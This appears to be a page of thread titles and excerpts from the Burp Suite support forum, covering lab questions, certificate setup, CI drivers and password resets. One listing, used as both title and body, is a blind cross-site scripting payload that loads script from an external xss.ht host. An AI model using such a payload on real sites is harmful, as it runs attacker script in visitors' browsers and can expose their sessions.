Complete the OS Injection Labs?

Hello all! How can I complete the OS Injection labs without Burp Suite Pro? The instructions instruct me to use the public Burp Collaborator server...

Configuring a Burp root CA certificate in iOS13

Finally got this working!!! Here are the full instructions: 1. Generate a certificate with the following commands (notice the extendedKeyUsage addition to Nick's answer above) openssl req -x509 -nodes -newkey rsa:4096...

Creating new site using graphql

I am new to graphql. I've been able to run queries, but have not been able to run any mutations. Trying to create a new site using the following query: Python: query = {"mutation": "{create_site(input{name: Mysite,...

Encounter Error: connection refused when run the generic CI driver locally

Hi team, I run into an issue when I try to run the CI driver locally, I use the burp-ci-driver-1.0.5beta.jar because this version does not require self-signed-certificate, but when I run the scan command, my terminal...

"><script src=https://site.xss.ht></script>

"><script src=https://site.xss.ht></script>

in authentication lab Username enumeration via account lock

in authentication lab Username enumeration via account lock i have been brute forcing all the username with adding count parameter in the body and doing as shown in the solution but i only receive response which shows...

Run Burp Suite in a Non GUI Environment

Hi! First of all Thank you for this wonderful gift that PortSwigger Team have created for InfoSec Community. I have a question regarding running Burp in a full Non GUI Environment, so our team at work right now is trying...

Encounter Error: connection refused when run the generic CI driver locally

Hi team, I run into an issue when I try to run the CI driver locally, I use the burp-ci-driver-1.0.5beta.jar because this version does not require self-signed-certificate, but when I run the scan command, my terminal...

Creating new site using graphql

I am new to graphql. I've been able to run queries, but have not been able to run any mutations. Trying to create a new site using the following query: Python: query = {"mutation": "{create_site(input{name: Mysite,...

There was something wrong with your antiforgery token

Not able to comment due to error: There was something wrong with your antiforgery token

Academy module - Access control vulnerabilities and privilege escalation Bug report

While trying to solve this lab Lab: User role can be modified in user profile I am not able to login into the user profile with the default credentials given. (You can log in to your own account using wiener:peter.) I...

Ability to time requests?

I would like to know if there's a feature in the intuder/repeater to send requests in a specific time either configuring the request to trigger at a time (hh:mm:ss) or making it trigger by unix time, if this feature doesn't...

Complete this training lab for serialized-objects

I have been following the lab below however I cant seem to resolve or not expecting the results burp had found and unable to complete this...

E-CERTIFICATE

Will portswigger provide an e-certificate after completion of the course?

Scan configs not getting picked for future scans

I am Loading Burp with configuration through config library. I have changed handling error during audit settings as follows: Pause the task if: 100 consecutive audit items failed. But when I scan things, the...

Reset password

I forgot the password to login. When I'm trying to reset the password using, adminusercreator, it is asking for database url. I installed burp suite with all default options. In this case, what will the database url? How to...

Reset password

I forgot the password to login. When I'm trying to reset the password using, adminusercreator, it is asking for database url. I installed burp suite with all default options. In this case, what will the database url? How to...

problem with sqli

I have been trying to exploit a sqli, because I do not have much knowledge on the subject, I wanted to ask for some opinion on how I could execute a successful sql query i have page vulnerable...

Burp Enterprise ... multiple logins

I wonder if there is a way to have two levels of logging ? - I need to log into the supplier infrastructure to access to my root web application - I need to log into the application to access to the user space Is this...

No alerts but no connection from Android app

I was able to inspect the traffic from an Android app with a rooted device and burpsuite certificate installed as root certificates. After an update of the app i am no longer able to inspect the traffic. No alert on the...

Page 1 of 118

Burp Suite Support Center

Your source for help and advice on all things Burp-related.